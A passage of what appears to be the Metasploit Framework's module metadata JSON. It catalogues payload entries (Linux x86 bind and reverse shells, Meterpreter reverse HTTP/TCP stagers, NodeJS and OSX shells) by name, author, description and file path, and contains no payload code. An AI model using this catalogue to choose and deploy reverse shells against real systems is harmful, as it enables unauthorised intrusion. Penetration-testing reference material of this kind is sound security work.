"author": [ - "hal" - ], - "description": "Read up to 4096 bytes from the local file system and 
write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/read_file.rb", - "is_install_path": true, - "ref_name": "linux/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell/bind_ipv6_tcp": { - "name": "Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_linux/x86/shell/bind_ipv6_tcp_uuid": { - "name": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Spawn a command shell (staged).\n\nListen for an IPv6 
connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_linux/x86/shell/bind_nonx_tcp": { - "name": "Linux Command Shell, Bind TCP Stager", - "fullname": "payload/linux/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_linux/x86/shell/bind_tcp": { - "name": "Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - 
"platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_linux/x86/shell/bind_tcp_uuid": { - "name": "Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_linux/x86/shell/find_tag": { - "name": "Linux Command Shell, Find Tag Stager", - "fullname": "payload/linux/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "x86", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_linux/x86/shell/reverse_ipv6_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/linux/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "kris katterjohn " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_linux/x86/shell/reverse_nonx_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_linux/x86/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt ", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_linux/x86/shell/reverse_tcp_uuid": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": 
null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_linux/x86/shell_bind_ipv6_tcp": { - "name": "Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/linux/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Listen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": 
"linux/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_bind_tcp_random_port": { - "name": "Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/linux/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_find_port", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_find_tag": { - "name": "Linux Command Shell, Find Tag Inline", - "fullname": "payload/linux/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle ", - "joev " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/shell_reverse_tcp_ipv6": { - "name": "Linux Command Shell, Reverse TCP Inline 
(IPv6)", - "fullname": "payload/linux/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matteo Malvica " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "linux/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/zarch/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/zarch/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/zarch/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/zarch/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/zarch/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam 
Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/zarch/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/zarch/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/zarch/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/zarch/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_mainframe/shell_reverse_tcp": { - "name": "Z/OS (MVS) Command Shell, Reverse TCP Inline", - "fullname": "payload/mainframe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Listen for a connection and spawn a command shell.\n This implementation does not include ebcdic character 
translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", - "references": [], - "platform": "Mainframe", - "arch": "zarch", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "mainframe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_multi/meterpreter/reverse_http": { - "name": "Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)", - "fullname": "payload/multi/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves" - ], - "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Multi", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/multi/reverse_http.rb", - "is_install_path": true, - "ref_name": "multi/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "multi/meterpreter", - "stager_refname": "multi/reverse_http" - }, - "payload_multi/meterpreter/reverse_https": { - "name": 
"Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)", - "fullname": "payload/multi/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves" - ], - "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Multi", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/multi/reverse_https.rb", - "is_install_path": true, - "ref_name": "multi/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "multi/meterpreter", - "stager_refname": "multi/reverse_https" - }, - "payload_netware/shell/reverse_tcp": { - "name": "NetWare Command Shell, Reverse TCP Stager", - "fullname": "payload/netware/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "toto" - ], - "description": "Connect to the NetWare console (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Netware", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/netware/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "netware/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": 
false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "netware/shell", - "stager_refname": "netware/reverse_tcp" - }, - "payload_nodejs/shell_bind_tcp": { - "name": "Command Shell, Bind TCP (via nodejs)", - "fullname": "payload/nodejs/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Creates an interactive shell via nodejs", - "references": [], - "platform": "NodeJS", - "arch": "nodejs", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "nodejs/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_nodejs/shell_reverse_tcp": { - "name": "Command Shell, Reverse TCP (via nodejs)", - "fullname": "payload/nodejs/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan", - "joev " - ], - "description": "Creates an interactive shell via nodejs", - "references": [], - "platform": "NodeJS", - "arch": "nodejs", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "nodejs/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_nodejs/shell_reverse_tcp_ssl": { - "name": "Command Shell, Reverse TCP SSL (via nodejs)", - "fullname": 
"payload/nodejs/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan", - "joev " - ], - "description": "Creates an interactive shell via nodejs, uses SSL", - "references": [], - "platform": "NodeJS", - "arch": "nodejs", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "nodejs/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/exec": { - "name": "OSX aarch64 Execute Command", - "fullname": "payload/osx/aarch64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "alanfoster" - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-12-30 16:26:31 +0000", - "path": "/modules/payloads/singles/osx/aarch64/exec.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/meterpreter/reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Stager", - "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr", - "usiegl00" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [ - 
"URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-07-31 20:30:30 +0000", - "path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/aarch64/meterpreter", - "stager_refname": "osx/aarch64/reverse_tcp" - }, - "payload_osx/aarch64/meterpreter_reverse_http": { - "name": "OSX Meterpreter, Reverse HTTP Inline", - "fullname": "payload/osx/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr", - "usiegl00" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-14 15:43:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/meterpreter_reverse_https": { - "name": "OSX Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/osx/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr", - "usiegl00" - ], - "description": "Run the 
Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-14 15:43:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/meterpreter_reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Inline", - "fullname": "payload/osx/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr", - "usiegl00" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-14 15:43:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/shell_bind_tcp": { - "name": "OS X x64 Shell Bind TCP", - "fullname": "payload/osx/aarch64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "alanfoster" - ], - "description": "Bind an arbitrary command to an arbitrary port", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, 
- "mod_time": "2024-02-01 01:05:40 +0000", - "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/aarch64/shell_reverse_tcp": { - "name": "OSX aarch64 Shell Reverse TCP", - "fullname": "payload/osx/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "alanfoster" - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-02 14:13:07 +0000", - "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/aarch64/shell_reverse_tcp", - "check": 